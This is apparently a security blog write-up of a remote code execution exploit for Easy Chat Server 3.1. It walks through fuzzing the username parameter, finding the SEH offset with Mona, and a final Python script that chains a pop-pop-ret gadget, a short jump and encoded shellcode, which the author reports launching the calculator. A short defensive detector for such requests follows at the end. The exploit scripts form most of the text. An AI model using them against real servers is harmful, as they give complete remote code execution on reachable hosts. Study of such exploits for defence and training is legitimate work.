
Easy Chat Server 3.1 Exploit (RCE)

ii4gsp 2020. 12. 30. 01:10
Test Environment: Windows 10 x64
Test Program: Easy Chat Server 3.1 x86
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py
Mitigation: StackGuard, safeSEH

 

 

Running the program starts the chat server.

When you click the Start button, the server comes up and clients can connect to it.

 

 

To connect to the chat server, browse to the server's IP address.

 

 

After entering guest as the Name, you are placed in a chat room and the browser shows a URL like the one below.

URL: http://172.26.160.1/chat.ghp?username=guest&password=&room=1&sex=2

 

The user name is passed straight into the username parameter, so that parameter is fuzzed to locate the overflow.

 

 

Use the !mona pc 500 command to generate a 500-byte cyclic pattern.

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

payload = (
    "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9A" 
    "d0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag" 
    "1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3" 
    "Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5" 
    "Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4" 
    "Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
)

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

With the server running under the debugger, send the generated pattern in the username parameter.

The EIP register is overwritten with 0x34684133.

Use the !mona po 34684133 command to find the offset of that value within the pattern. As the Mona output shows, the exact offset at which EIP is overwritten is 221.

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

payload = ""
payload += "A" * 221
payload += "B" * 4
payload += "C" * 100

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

Send 221 bytes of padding followed by four B's to verify that the offset is correct.

If the offset is correct, EIP will be overwritten with the B's.

EIP was indeed overwritten with 0x42424242, as intended.

 

 

SafeSEH must be bypassed in order to exploit the overflow.

A pop pop ret (ppr) gadget is required to bypass SafeSEH.

If pExceptionHandler holds the address of the ppr gadget, then when the handler is invoked ESP points to the return address at the top of the stack.

When the ppr gadget runs, the two pops discard the return address and the ExceptionRecord pointer, and the ret transfers control to the EstablisherFrame address, which is the address of pNextSEHRecord.

If that location holds a short jmp that skips over the handler address and into the shellcode, the dummy bytes and shellcode that follow are executed.

 

 

!mona findwild -s "pop r32#pop r32#ret" -m SSLEAY32.dll

Because SSLEAY32.dll has no protection applied, use the command above to find a pop pop ret gadget in it.

Null bytes mark the end of a string, so if one appears in the payload the string is cut off at that point and the rest of the payload is never delivered; the payload must therefore contain no null bytes.

ppr address: 0x100185e5

 

 

import socket

TARGET = "172.26.160.1"
PORT = 80

shellcode = (
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" 
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" 
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" 
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" 
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" 
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" 
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" 
    "\x1c\x39\xbd"
)

payload = ""
payload += "A" * 217
payload += "\xeb\x06\x90\x90" # jmp to shellcode
payload += "\xe5\x85\x01\x10" # pop/pop/ret
payload += shellcode
payload += "B" * 199

buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Host: 192.168.1.136:80\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Referer: http://192.168.1.136\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(buf)

s.close()

Exploit Code

The exploit succeeded and the shellcode launched the calculator.
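The following is an added example, not part of the original post, written from the defender's side: a Python 3 check that parses a raw GET /chat.ghp request of the shape the scripts above send and flags a username parameter that exceeds the 221-byte offset found above, carries non-printable bytes, or looks like a Mona cyclic pattern. The thresholds, function names and sample requests are constructed for the example.

```python
import re

# Thresholds anchored on the page's findings: the SEH handler was overwritten at
# offset 221, so a username longer than that has already left the buffer.
# Constructed for this example, not values taken from the server.
MAX_USERNAME = 221
CYCLIC_RE = re.compile(rb"(?:[A-Z][a-z][0-9]){8,}")  # Mona/msf pattern triplets

def username_from_request(raw: bytes):
    """Return the raw, undecoded username of a GET /chat.ghp request, else None.

    No URL decoding is done, so binary bytes survive; a payload containing a
    space, '&' or '=' is truncated here just as the server's parsing would.
    """
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    if len(parts) < 2 or parts[0] != b"GET":
        return None
    path, _, query = parts[1].partition(b"?")
    if path != b"/chat.ghp":
        return None
    for pair in query.split(b"&"):
        key, _, value = pair.partition(b"=")
        if key == b"username":
            return value
    return None

def inspect_request(raw: bytes):
    """Classify one raw request; an empty list means nothing suspicious was seen."""
    username = username_from_request(raw)
    if username is None:
        return []
    findings = []
    if len(username) > MAX_USERNAME:
        findings.append("username_overflow")     # past the 221-byte SEH offset
    if any(b < 0x20 or b > 0x7E for b in username):
        findings.append("non_printable_bytes")   # shellcode/gadget bytes, not a name
    if CYCLIC_RE.search(username):
        findings.append("cyclic_pattern")        # offset-discovery fuzzing
    return findings

def build_request(username: bytes) -> bytes:
    """Constructed sample request in the same shape as the page's scripts."""
    return (b"GET /chat.ghp?username=" + username
            + b"&password=&room=1&sex=1 HTTP/1.1\r\nHost: 192.168.1.136:80\r\n\r\n")

if __name__ == "__main__":
    for name in (b"guest", b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9", b"A" * 230 + b"\x90\x90\xcc"):
        print(len(name), inspect_request(build_request(name)))
```

Run against a capture of the server's port 80 traffic, the three findings separate a normal login from an offset-discovery run and from a weaponised request.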
